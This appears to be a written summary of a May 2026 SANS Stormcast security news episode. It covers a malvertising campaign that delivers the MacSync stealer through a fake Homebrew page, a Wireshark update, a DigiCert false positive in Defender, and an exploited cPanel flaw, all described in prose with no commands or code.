SANS Stormcast Monday, May 4th, 2026: Malicious Homebrew Ads; Wireshark Update; Digicert False Positive; cPanel Exploited

The Stormcast episode highlighted a sophisticated Homebrew attack that leverages Google’s ad platform and sites.google.com to deliver a malicious installer. Victims see a familiar business.google.com URL, click through to a counterfeit Homebrew page, and are prompted to paste a base64‑encoded script. That script fetches additional payloads, ultimately installing the MacSync stealer. Because the download chain uses legitimate Google‑hosted domains, many endpoint defenses miss the activity, underscoring the need for strict script‑execution policies and vigilant monitoring of copy‑paste actions in terminal sessions.

Wireshark 4.6.5 arrived with a substantial security overhaul, addressing 43 vulnerabilities identified through AI‑driven code analysis. Several flaws could lead to remote code execution, making the update critical for network analysts and incident responders. The release also refreshed the startup page with a prominent ad for the SharkFest conference and a donation button, reflecting the project’s community‑funded model. Users are encouraged to upgrade promptly and consider supporting the open‑source tool that remains essential for packet inspection.

Microsoft Defender for Endpoint mistakenly flagged DigiCert authority certificates after a supply‑chain breach compromised 60 certificates at DigiCert. Although the certificates were revoked, the false‑positive removal highlighted the challenges of automated trust decisions. The episode also warned of a widely exploited cPanel vulnerability, with patches now available on cpanel.net. Administrators should verify auto‑update settings, apply the latest fixes, and assume compromise for any exposed cPanel instance, given its role in hosting numerous customer sites. Proactive patch management and layered defenses are the best mitigation strategies.